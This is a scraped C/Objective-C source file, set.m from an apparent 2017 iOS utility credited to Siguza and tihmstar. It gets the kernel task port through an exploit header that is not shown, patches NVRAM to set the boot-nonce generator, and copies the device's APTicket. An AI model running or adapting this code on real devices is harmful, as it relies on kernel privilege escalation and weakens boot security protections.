Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
/*
2
 * set.m - High-level handler to set boot nonce
3
 *
4
 * Copyright (c) 2017 Siguza & tihmstar
5
 */
6

7
#include <errno.h>
8
#include <stdbool.h>
9
#include <stdio.h>
10
#include <string.h>
11
#include <unistd.h>
12
#include <sys/stat.h>
13
#include <mach/mach.h>
14
#include <IOKit/IOKitLib.h>
15
#include <CoreFoundation/CoreFoundation.h>
16

17
#include "arch.h"
18
#include "exploit64.h"
19
#include "nvpatch.h"
20
#include "set.h"
21

22
static int party_hard(void)
23
{
24
    int ret = 0;
25
    if(getuid() != 0) // Skip if we got root already
26
    {
27
        ret = -1;
28
        vm_address_t kbase = 0;
29
        task_t kernel_task = get_kernel_task(&kbase);
30
        LOG("kernel_task: 0x%x", kernel_task);
31
        if(MACH_PORT_VALID(kernel_task))
32
        {
33
            ret = nvpatch(kernel_task, kbase, "com.apple.System.boot-nonce");
34
        }
35
    }
36
    return ret;
37
}
38

39
bool set_generator(const char *gen)
40
{
41
    bool ret = false;
42

43
    CFStringRef str = CFStringCreateWithCStringNoCopy(NULL, gen, kCFStringEncodingUTF8, kCFAllocatorNull);
44
    CFMutableDictionaryRef dict = CFDictionaryCreateMutable(NULL, 0, &kCFCopyStringDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
45
    if(!str || !dict)
46
    {
47
        LOG("Failed to allocate CF objects");
48
    }
49
    else
50
    {
51
        CFDictionarySetValue(dict, CFSTR("com.apple.System.boot-nonce"), str);
52
        CFRelease(str);
53

54
        io_service_t nvram = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
55
        if(!MACH_PORT_VALID(nvram))
56
        {
57
            LOG("Failed to get IODTNVRAM service");
58
        }
59
        else
60
        {
61
            if(party_hard() == 0)
62
            {
63
                kern_return_t kret = IORegistryEntrySetCFProperties(nvram, dict);
64
                LOG("IORegistryEntrySetCFProperties: %s", mach_error_string(kret));
65
                if(kret == KERN_SUCCESS)
66
                {
67
                    ret = true;
68
                }
69
            }
70
        }
71

72
        CFRelease(dict);
73
    }
74

75
    return ret;
76
}
77

78
bool dump_apticket(const char *to)
79
{
80
    bool ret = false;
81
    if(party_hard() == 0)
82
    {
83
        const char *from = "/System/Library/Caches/apticket.der";
84
        struct stat s;
85
        if(stat(from, &s) != 0)
86
        {
87
            LOG("stat failed: %s", strerror(errno));
88
        }
89
        else
90
        {
91
            FILE *in  = fopen(from, "rb");
92
            if(in == NULL)
93
            {
94
                LOG("failed to open src: %s", strerror(errno));
95
            }
96
            else
97
            {
98
                FILE *out = fopen(to, "wb");
99
                if(out == NULL)
100
                {
101
                    LOG("failed to open dst: %s", strerror(errno));
102
                }
103
                else
104
                {
105
                    char *buf = malloc(s.st_size);
106
                    if(buf == NULL)
107
                    {
108
                        LOG("failed to alloc buf: %s", strerror(errno));
109
                    }
110
                    else
111
                    {
112
                        fread(buf, s.st_size, 1, in);
113
                        fwrite(buf, s.st_size, 1, out);
114
                        free(buf);
115
                        ret = true;
116
                    }
117
                    fclose(out);
118
                }
119
                fclose(in);
120
            }
121
        }
122
    }
123
    return ret;
124
}
125

126